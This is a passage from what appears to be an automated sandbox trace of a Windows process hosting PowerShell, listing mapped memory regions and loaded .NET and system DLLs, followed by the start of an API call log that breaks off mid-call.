0x2b0000 end_va = 0x2dffff entry_point = 0x2b0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db") Region: id = 1873 start_va = 0x3e0000 end_va = 0x3e3fff entry_point = 0x3e0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1874 start_va = 0x1bd0000 end_va = 0x1c35fff entry_point = 0x1bd0000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 1875 start_va = 0x74930000 end_va = 0x7499ffff entry_point = 0x74930000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\SysWOW64\\ntshrui.dll" (normalized: "c:\\windows\\syswow64\\ntshrui.dll") Region: id = 1876 start_va = 0x74910000 end_va = 0x74928fff entry_point = 0x74910000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 1877 start_va = 0x1ce0000 end_va = 0x1d1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 1878 start_va = 0x28e0000 end_va = 0x291ffff entry_point = 0x0 region_type = private name = "private_0x00000000028e0000" filename = "" Region: id = 1879 start_va = 0x74900000 end_va = 0x7490afff entry_point = 0x74900000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 1880 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 1881 start_va = 0x748f0000 end_va = 0x748f9fff entry_point = 0x748f0000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\SysWOW64\\slc.dll" (normalized: "c:\\windows\\syswow64\\slc.dll") Region: id = 1882 start_va = 0x749c0000 end_va = 0x749fafff entry_point = 0x749c0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1883 start_va = 0x74bb0000 end_va = 0x74bc5fff entry_point = 0x74bb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1884 start_va = 0x74870000 end_va = 0x748e7fff entry_point = 0x74870000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 1885 start_va = 0x74a20000 end_va = 0x74a28fff entry_point = 0x74a20000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1886 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1887 start_va = 0x2af0000 end_va = 0x2b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002af0000" filename = "" Region: id = 1888 start_va = 0x732b0000 end_va = 0x7385afff entry_point = 0x732b0000 region_type = mapped_file name = "mscorwks.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll") Region: id = 1889 start_va = 0x747d0000 end_va = 0x7486afff entry_point = 0x747d0000 region_type = mapped_file name = "msvcr80.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll") Region: id = 1978 start_va = 0x480000 end_va = 0x480fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1979 start_va = 0x490000 end_va = 0x490fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 1980 start_va = 0x1c40000 end_va = 0x1c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 1981 start_va = 0x1c50000 end_va = 0x1c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 1982 start_va = 0x1c60000 end_va = 0x1c6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c60000" filename = "" Region: id = 1983 start_va = 0x1c70000 end_va = 0x1c7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 1984 start_va = 0x1c80000 end_va = 0x1c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 1985 start_va = 0x1c90000 end_va = 0x1c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c90000" filename = "" Region: id = 1986 start_va = 0x1cb0000 end_va = 0x1cbffff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 1987 start_va = 0x27b0000 end_va = 0x27effff entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 1988 start_va = 0x27f0000 end_va = 0x288ffff entry_point = 0x0 region_type = private name = "private_0x00000000027f0000" filename = "" Region: id = 1989 start_va = 0x2980000 end_va = 0x29bffff entry_point = 0x0 region_type = private name = "private_0x0000000002980000" filename = "" Region: id = 1990 start_va = 0x2a80000 end_va = 0x2abffff entry_point = 0x0 region_type = private name = "private_0x0000000002a80000" filename = "" Region: id = 1991 start_va = 0x2b30000 end_va = 0x4b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b30000" filename = "" Region: id = 1992 start_va = 0x4b30000 end_va = 0x4b6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b30000" filename = "" Region: id = 1993 start_va = 0x727b0000 end_va = 0x732a7fff entry_point = 0x727b0000 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll") Region: id = 1994 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 1995 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 2222 start_va = 0x1cc0000 end_va = 0x1ccffff entry_point = 0x0 region_type = private name = "private_0x0000000001cc0000" filename = "" Region: id = 2223 start_va = 0x4b70000 end_va = 0x4e51fff entry_point = 0x4b70000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 2224 start_va = 0x72010000 end_va = 0x727abfff entry_point = 0x72010000 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System\\9e0a3b9b9f457233a335d7fba8f95419\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system\\9e0a3b9b9f457233a335d7fba8f95419\\system.ni.dll") Region: id = 2225 start_va = 0x74ea0000 end_va = 0x74f20fff entry_point = 0x74ea0000 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\b1c511d8fad78ad3c5213b2b4fb02b8b\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\b1c511d8fad78ad3c5213b2b4fb02b8b\\microsoft.powershell.consolehost.ni.dll") Region: id = 2226 start_va = 0x71790000 end_va = 0x72009fff entry_point = 0x71790000 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management.A#\\4436815b432c313255af322f4ec3560d\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management.a#\\4436815b432c313255af322f4ec3560d\\system.management.automation.ni.dll") Region: id = 2227 start_va = 0x73a30000 end_va = 0x73d11fff entry_point = 0x73a30000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 2228 start_va = 0x73a30000 end_va = 0x73d11fff entry_point = 0x73a30000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 2229 start_va = 0x1cd0000 end_va = 0x1cd2fff entry_point = 0x1cd0000 region_type = mapped_file name = "l_intl.nls" filename = "\\Windows\\SysWOW64\\l_intl.nls" (normalized: "c:\\windows\\syswow64\\l_intl.nls") Region: id = 2230 start_va = 0x29c0000 end_va = 0x2a7ffff entry_point = 0x29c0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2647 start_va = 0x75380000 end_va = 0x75384fff entry_point = 0x75380000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 2942 start_va = 0x1d60000 end_va = 0x1d60fff entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 2970 start_va = 0x1d70000 end_va = 0x1d74fff entry_point = 0x1d70000 region_type = mapped_file name = "sorttbls.nlp" filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp") Region: id = 2971 start_va = 0x2760000 end_va = 0x27a0fff entry_point = 0x2760000 region_type = mapped_file name = "sortkey.nlp" filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp") Region: id = 2972 start_va = 0x73a30000 end_va = 0x73d11fff entry_point = 0x73a30000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 2973 start_va = 0x73a30000 end_va = 0x73d11fff entry_point = 0x73a30000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 3091 start_va = 0x1ea0000 end_va = 0x1ea7fff entry_point = 0x1ea0000 region_type = mapped_file name = "microsoft.wsman.runtime.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll") Region: id = 3092 start_va = 0x1eb0000 end_va = 0x1eb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001eb0000" filename = "" Region: id = 3093 start_va = 0x2890000 end_va = 0x28d2fff entry_point = 0x2890000 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 3094 start_va = 0x67aa0000 end_va = 0x67ae2fff entry_point = 0x67aa0000 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 3095 start_va = 0x74220000 end_va = 0x742bbfff entry_point = 0x74220000 region_type = mapped_file name = "system.transactions.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Transactions\\ad18f93fc713db2c4b29b25116c13bd8\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.transactions\\ad18f93fc713db2c4b29b25116c13bd8\\system.transactions.ni.dll") Region: id = 3096 start_va = 0x742c0000 end_va = 0x744f4fff entry_point = 0x742c0000 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Core\\fbc05b5b05dc6366b02b8e2f77d080f1\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.core\\fbc05b5b05dc6366b02b8e2f77d080f1\\system.core.ni.dll") Region: id = 3097 start_va = 0x74740000 end_va = 0x747c4fff entry_point = 0x74740000 region_type = mapped_file name = "microsoft.wsman.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.WSMan.Man#\\ee28a075665b6bc23b6dae56903d431d\\Microsoft.WSMan.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.wsman.man#\\ee28a075665b6bc23b6dae56903d431d\\microsoft.wsman.management.ni.dll") Region: id = 3098 start_va = 0x74e10000 end_va = 0x74e34fff entry_point = 0x74e10000 region_type = mapped_file name = "system.configuration.install.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Configuratio#\\f02737c83305687a68c088927a6c5a98\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.configuratio#\\f02737c83305687a68c088927a6c5a98\\system.configuration.install.ni.dll") Region: id = 3099 start_va = 0x74e50000 end_va = 0x74e9afff entry_point = 0x74e50000 region_type = mapped_file name = "microsoft.powershell.commands.diagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\4f68cd04686e5dc5a55070d112d44bdf\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\4f68cd04686e5dc5a55070d112d44bdf\\microsoft.powershell.commands.diagnostics.ni.dll") Region: id = 3109 start_va = 0x1ec0000 end_va = 0x1ec0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 3110 start_va = 0x60340000 end_va = 0x60347fff entry_point = 0x60340000 region_type = mapped_file name = "culture.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\culture.dll") Region: id = 3111 start_va = 0x73f80000 end_va = 0x73facfff entry_point = 0x73f80000 region_type = mapped_file name = "microsoft.powershell.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\8ce205027e30804d1b2deaffa0582735\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\8ce205027e30804d1b2deaffa0582735\\microsoft.powershell.security.ni.dll") Region: id = 3112 start_va = 0x73fb0000 end_va = 0x74072fff entry_point = 0x73fb0000 region_type = mapped_file name = "microsoft.powershell.commands.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\8df695fb80187f65208d87229e81e8a2\\Microsoft.PowerShell.Commands.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\8df695fb80187f65208d87229e81e8a2\\microsoft.powershell.commands.management.ni.dll") Region: id = 3113 start_va = 0x74080000 end_va = 0x7421dfff entry_point = 0x74080000 region_type = mapped_file name = "microsoft.powershell.commands.utility.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\3008a05e2928e2c1d856cc34e0422c17\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\3008a05e2928e2c1d856cc34e0422c17\\microsoft.powershell.commands.utility.ni.dll") Region: id = 3137 start_va = 0x1ec0000 end_va = 0x1ecffff entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 3138 start_va = 0x1f10000 end_va = 0x1f20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f10000" filename = "" Region: id = 3139 start_va = 0x2920000 end_va = 0x2973fff entry_point = 0x2920000 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorrc.dll") Region: id = 3140 start_va = 0x71250000 end_va = 0x71785fff entry_point = 0x71250000 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\system.xml.ni.dll") Region: id = 3141 start_va = 0x73d50000 end_va = 0x73e63fff entry_point = 0x73d50000 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.DirectorySer#\\45ec12795950a7d54691591c615a9e3c\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.directoryser#\\45ec12795950a7d54691591c615a9e3c\\system.directoryservices.ni.dll") Region: id = 3142 start_va = 0x73e70000 end_va = 0x73f73fff entry_point = 0x73e70000 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\system.management.ni.dll") Region: id = 3509 start_va = 0x1f30000 end_va = 0x1f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 3510 start_va = 0x1f40000 end_va = 0x1f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 3511 start_va = 0x2ac0000 end_va = 0x2acffff entry_point = 0x0 region_type = private name = "private_0x0000000002ac0000" filename = "" Region: id = 3512 start_va = 0x2ad0000 end_va = 0x2adffff entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" filename = "" Region: id = 3513 start_va = 0x2ae0000 end_va = 0x2aeffff entry_point = 0x0 region_type = private name = "private_0x0000000002ae0000" filename = "" Region: id = 3514 start_va = 0x4e60000 end_va = 0x4e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e60000" filename = "" Region: id = 3515 start_va = 0x4e70000 end_va = 0x4e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e70000" filename = "" Region: id = 3516 start_va = 0x4e80000 end_va = 0x4e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e80000" filename = "" Region: id = 3517 start_va = 0x4f20000 end_va = 0x4f5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f20000" filename = "" Region: id = 3518 start_va = 0x4fd0000 end_va = 0x500ffff entry_point = 0x0 region_type = private name = "private_0x0000000004fd0000" filename = "" Region: id = 3519 start_va = 0x74a10000 end_va = 0x74a17fff entry_point = 0x74a10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 3520 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 3522 start_va = 0x4e90000 end_va = 0x4f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e90000" filename = "" Region: id = 3546 start_va = 0x4f10000 end_va = 0x4f1ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f10000" filename = "" Region: id = 3547 start_va = 0x4f60000 end_va = 0x4f60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f60000" filename = "" Region: id = 3548 start_va = 0x5010000 end_va = 0x52e1fff entry_point = 0x5010000 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 3549 start_va = 0x64e70000 end_va = 0x65141fff entry_point = 0x64e70000 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 3550 start_va = 0x70bf0000 end_va = 0x71240fff entry_point = 0x70bf0000 region_type = mapped_file name = "system.data.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Data\\1e85062785e286cd9eae9c26d2c61f73\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.data\\1e85062785e286cd9eae9c26d2c61f73\\system.data.ni.dll") Region: id = 3551 start_va = 0x758b0000 end_va = 0x758e4fff entry_point = 0x758b0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3552 start_va = 0x759e0000 end_va = 0x759ebfff entry_point = 0x759e0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 3553 start_va = 0x76650000 end_va = 0x7676cfff entry_point = 0x76650000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 3554 start_va = 0x77790000 end_va = 0x77795fff entry_point = 0x77790000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 3558 start_va = 0x4f70000 end_va = 0x4f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f70000" filename = "" Region: id = 3559 start_va = 0x4f80000 end_va = 0x4f80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f80000" filename = "" Region: id = 3560 start_va = 0x739d0000 end_va = 0x73a2afff entry_point = 0x739d0000 region_type = mapped_file name = "mscorjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorjit.dll") Region: id = 3563 start_va = 0x4f90000 end_va = 0x4f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f90000" filename = "" Region: id = 3564 start_va = 0x4fa0000 end_va = 0x4faffff entry_point = 0x0 region_type = private name = "private_0x0000000004fa0000" filename = "" Region: id = 3565 start_va = 0x4fb0000 end_va = 0x4fbffff entry_point = 0x0 region_type = private name = "private_0x0000000004fb0000" filename = "" Region: id = 3566 start_va = 0x74df0000 end_va = 0x74df4fff entry_point = 0x74df0000 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll") Region: id = 3575 start_va = 0x4fc0000 end_va = 0x4fc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004fc0000" filename = "" Region: id = 3576 start_va = 0x5360000 end_va = 0x539ffff entry_point = 0x0 region_type = private name = "private_0x0000000005360000" filename = "" Region: id = 3577 start_va = 0x53f0000 end_va = 0x542ffff entry_point = 0x0 region_type = private name = "private_0x00000000053f0000" filename = "" Region: id = 3578 start_va = 0x55d0000 end_va = 0x5f5ffff entry_point = 0x0 region_type = private name = "private_0x00000000055d0000" filename = "" Region: id = 3579 start_va = 0x5e3a0000 end_va = 0x5e42cfff entry_point = 0x5e3a0000 region_type = mapped_file name = "diasymreader.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\diasymreader.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\diasymreader.dll") Region: id = 3580 start_va = 0x7efa1000 end_va = 0x7efa3fff entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 3589 start_va = 0x52f0000 end_va = 0x52fffff entry_point = 0x0 region_type = private name = "private_0x00000000052f0000" filename = "" Region: id = 3590 start_va = 0x5430000 end_va = 0x552ffff entry_point = 0x0 region_type = private name = "private_0x0000000005430000" filename = "" Region: id = 3592 start_va = 0x74a00000 end_va = 0x74a08fff entry_point = 0x74a00000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Thread: id = 111 os_tid = 0x114 [0109.764] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0112.121] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0112.121] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0112.121] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0112.121] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0126.983] GetVersionExW (in: lpVersionInformation=0x3383a8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3383a8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0126.983] GetLastError () returned 0x2 [0126.984] GetVersionExW (in: lpVersionInformation=0x3383a8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3383a8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0126.984] GetLastError () returned 0x2 [0127.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e2dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0127.027] GetLastError () returned 0x2 [0127.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e2f8, lpFilePart=0x0 | out: 